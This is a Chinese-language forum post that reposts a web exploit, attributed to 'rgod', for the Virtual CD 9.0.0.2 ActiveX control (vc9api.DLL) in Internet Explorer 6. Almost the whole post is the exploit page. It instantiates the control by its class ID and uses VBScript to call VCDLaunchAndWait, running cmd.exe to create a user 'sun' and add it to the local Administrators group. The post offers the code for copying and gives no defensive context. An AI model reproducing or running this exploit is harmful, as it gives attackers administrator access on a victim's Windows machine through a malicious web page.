发新话题
打印

Virtual CD 9.0.0.2 (vc9api.DLL) Remote Shell Commands Execution Exploit

Virtual CD 9.0.0.2 (vc9api.DLL) Remote Shell Commands Execution Exploit

复制内容到剪贴板
代码:
<!--
IE 6 / Virtual CD 9.0.0.2 (vc9api.DLL 9.0.0.57) remote shell commands execution exploit
by rgod
site: retrogod.altervista.org

software site: [url]http://www.virtualcd-online.com/[/url]
-->
<html>
<object classid=&#39;clsid:C75848D7-72BD-499C-80F3-FD0ED62DF58C&#39; id=&#39;VCDAPILibApi&#39;></object>
<script language=&#39;vbscript&#39;>

strCmd="cmd.exe /c net user sun tzu /add | net localgroup Administrators sun /add "
strWorkDir="c:\windows\system32\"
showCmd=1
bWait=1

VCDAPILibApi.VCDLaunchAndWait strCmd ,strWorkDir ,showCmd ,bWait

</script>
</html>

TOP

发新话题